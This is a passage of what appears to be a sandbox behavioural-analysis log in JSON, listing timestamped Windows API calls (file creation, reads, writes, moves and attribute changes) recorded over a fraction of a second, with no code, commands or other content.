"DeviceIoControl"}, {"category": "device", "timestamp": 
"2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,900", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,910", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,920", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,930", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,940", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:53,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:53,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:54,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,120", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:54,150", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,160", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,160", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:54,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,180", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,190", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,200", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,200", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,220", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,230", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,240", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,240", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,260", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,270", "api": 